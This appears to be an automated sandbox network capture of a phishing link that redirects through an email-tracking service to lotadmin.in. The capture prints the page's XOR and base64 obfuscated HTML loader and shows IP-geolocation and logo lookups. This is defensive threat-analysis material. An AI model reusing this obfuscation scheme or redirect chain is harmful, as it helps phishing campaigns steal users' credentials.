                                                                                        Dec 9, 2024 17:47:04.410166025 CET1.1.1.1192.168.2.50xdaa7No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.240067959 CET1.1.1.1192.168.2.50xd310No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.240067959 CET1.1.1.1192.168.2.50xd310No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.240552902 CET1.1.1.1192.168.2.50xa57aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.883285999 CET1.1.1.1192.168.2.50xd091No error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.883285999 CET1.1.1.1192.168.2.50xd091No error (0)larkus.ao65.109.232.106A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.884044886 CET1.1.1.1192.168.2.50x81abNo error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.154984951 CET1.1.1.1192.168.2.50xc52aNo error (0)lotadmin.in92.249.45.121A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.061214924 CET1.1.1.1192.168.2.50x4538No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.061214924 CET1.1.1.1192.168.2.50x4538No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.061214924 CET1.1.1.1192.168.2.50x4538No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.061326027 CET1.1.1.1192.168.2.50x5592No error (0)api.ipify.org65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.070404053 CET1.1.1.1192.168.2.50x282cNo error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.070416927 CET1.1.1.1192.168.2.50x2462No error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.070416927 CET1.1.1.1192.168.2.50x2462No error (0)larkus.ao65.109.232.106A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.390860081 CET1.1.1.1192.168.2.50xbf8fNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.443842888 CET1.1.1.1192.168.2.50xa5f4No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.443842888 CET1.1.1.1192.168.2.50xa5f4No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.443842888 CET1.1.1.1192.168.2.50xa5f4No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.443842888 CET1.1.1.1192.168.2.50xa5f4No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:08.443842888 CET1.1.1.1192.168.2.50xa5f4No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.259941101 CET1.1.1.1192.168.2.50x3907No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.259941101 CET1.1.1.1192.168.2.50x3907No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.259941101 CET1.1.1.1192.168.2.50x3907No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.259999037 CET1.1.1.1192.168.2.50x50deNo error (0)ipapi.co65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.356374025 CET1.1.1.1192.168.2.50x81d7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.356374025 CET1.1.1.1192.168.2.50x81d7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.356374025 CET1.1.1.1192.168.2.50x81d7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.357039928 CET1.1.1.1192.168.2.50xd5faNo error (0)api.ipify.org65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.749167919 CET1.1.1.1192.168.2.50x45dfNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.750967026 CET1.1.1.1192.168.2.50x976bNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.750967026 CET1.1.1.1192.168.2.50x976bNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.750967026 CET1.1.1.1192.168.2.50x976bNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.750967026 CET1.1.1.1192.168.2.50x976bNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.750967026 CET1.1.1.1192.168.2.50x976bNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.798304081 CET1.1.1.1192.168.2.50xbb8bNo error (0)ipapi.co65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.798494101 CET1.1.1.1192.168.2.50x155dNo error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.798494101 CET1.1.1.1192.168.2.50x155dNo error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.798494101 CET1.1.1.1192.168.2.50x155dNo error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                        • go.eu.sparkpostmail1.com
                                                                                        • lotadmin.in
                                                                                        • https:
                                                                                          • cdnjs.cloudflare.com
                                                                                          • www.larkus.ao
                                                                                          • api.ipify.org
                                                                                          • logo.clearbit.com
                                                                                          • ipapi.co
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.54971352.30.207.1514438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:02 UTC825OUTGET /f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~ HTTP/1.1
                                                                                        Host: go.eu.sparkpostmail1.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:02 UTC242INHTTP/1.1 302 Found
                                                                                        Date: Mon, 09 Dec 2024 16:47:02 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 114
                                                                                        Connection: close
                                                                                        X-Robots-Tag: noindex
                                                                                        Location: https://lotadmin.in/due/cigam/index
                                                                                        Vary: Accept
                                                                                        Server: msys-http
                                                                                        2024-12-09 16:47:02 UTC114INData Raw: 3c 70 3e 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 74 61 64 6d 69 6e 2e 69 6e 2f 64 75 65 2f 63 69 67 61 6d 2f 69 6e 64 65 78 22 3e 68 74 74 70 73 3a 2f 2f 6c 6f 74 61 64 6d 69 6e 2e 69 6e 2f 64 75 65 2f 63 69 67 61 6d 2f 69 6e 64 65 78 3c 2f 61 3e 3c 2f 70 3e
                                                                                        Data Ascii: <p>Found. Redirecting to <a href="https://lotadmin.in/due/cigam/index">https://lotadmin.in/due/cigam/index</a></p>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.54972392.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:04 UTC669OUTGET /due/cigam/index HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:05 UTC626INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: text/html
                                                                                        last-modified: Fri, 06 Dec 2024 14:03:29 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 3146
                                                                                        date: Mon, 09 Dec 2024 16:47:04 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:05 UTC742INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 62 66 75 73 63 61 74 65 64 20 48 54 4d 4c 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6e 63 6f 64 65 64 48 74 6d 6c 20 3d 20 22 54 30 51 6e 50 53 59 67 4d 6a 55 38 55 77 30 58 48 77 6c 4b 59 56 6b 52 42 77 67 50 55 67 6b 56 42 51 4a 45 55 51 41 4e 55 46 74 2b 56 77 30 63 45 67 46 64 65 45 56 55 53 30 56 46 48 67 41 58 45 30 55 58 41 77 51 4c 41 41 41 58 54 30 63 68 50 79 4e 55 53 30 64 64 65 45 56 55 53 30 56 46 48 67 41 58 45 30 55 61
                                                                                        Data Ascii: <!DOCTYPE html><html><head> <title>Obfuscated HTML</title></head><body> <script> var key = "secretkey"; var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0Ua
                                                                                        2024-12-09 16:47:05 UTC2404INData Raw: 50 48 51 49 62 52 67 59 57 48 52 45 43 47 77 73 52 47 55 64 48 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 30 56 46 47 67 67 45 55 68 59 47 43 46 68 62 47 67 67 43 46 51 42 62 42 77 6f 65 48 45 73 54 48 41 4a 57 53 77 59 56 45 68 59 51 54 30 63 59 42 41 49 57 55 77 6b 4d 45 77 45 64 42 51 4a 62 55 77 51 50 42 6c 68 57 4a 77 6f 65 48 45 64 44 48 51 73 59 42 41 51 64 54 6b 63 58 47 67 77 48 52 51 59 56 45 68 59 51 50 67 77 48 48 30 73 4c 46 68 55 50 45 77 59 52 51 30 49 56 48 41 51 48 47 77 73 54 54 45 6c 5a 56 41 6b 4d 45 77 45 52 44 30 4a 51 55 56 74 70 55 6b 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 56 30 6f 64 47 68 4e 64 65 47 39 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 30 56 46 46 77 77 56 55 67 59 59 43 68 59 4b 54 6b 63 56 46 78
                                                                                        Data Ascii: PHQIbRgYWHRECGwsRGUdHeUVDUkVUS0VZU0VDUkVUS0VFGggEUhYGCFhbGggCFQBbBwoeHEsTHAJWSwYVEhYQT0cYBAIWUwkMEwEdBQJbUwQPBlhWJwoeHEdDHQsYBAQdTkcXGgwHRQYVEhYQPgwHH0sLFhUPEwYRQ0IVHAQHGwsTTElZVAkMEwERD0JQUVtpUkVUS0VZU0VDUkVUV0odGhNdeG9US0VZU0VDUkVUS0VFFwwVUgYYChYKTkcVFx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.54972892.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:06 UTC555OUTGET /due/cigam/style.css HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://lotadmin.in/due/cigam/index
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:06 UTC704INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        cache-control: public, max-age=604800
                                                                                        expires: Mon, 16 Dec 2024 16:47:06 GMT
                                                                                        content-type: text/css
                                                                                        last-modified: Fri, 06 Dec 2024 13:29:25 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 4302
                                                                                        date: Mon, 09 Dec 2024 16:47:06 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:06 UTC4302INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 64 69
                                                                                        Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { font-family: 'Segoe UI', Arial, sans-serif; background-color: #f5f5f5; line-height: 1.6; min-height: 100vh;}.verification-container { min-height: 100vh; di


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549730104.17.25.144438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:06 UTC573OUTGET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://lotadmin.in/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:06 UTC946INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:06 GMT
                                                                                        Content-Type: text/css; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"620188b3-468e"
                                                                                        Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 803156
                                                                                        Expires: Sat, 29 Nov 2025 16:47:06 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GZFg9VCR1%2FH7bn7IMZ8YJGUZRk67EEMtYjd3GLltIUwwdDBubQE4vJPhc%2B11bQdIQFVj29OvsQUXNtCl%2BGRxIAWDIsH%2Bth2bH6BW4olIj0jQUGqhZ5baUx1Rzg4qrJYNxv7oqJO"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679a30d1d421c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-09 16:47:06 UTC423INData Raw: 37 62 66 65 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                        Data Ascii: 7bfe/*! * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65
                                                                                        Data Ascii: x-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4e
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69
                                                                                        Data Ascii: -pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-di
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69
                                                                                        Data Ascii: animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infini
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e
                                                                                        Data Ascii: irection,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,in
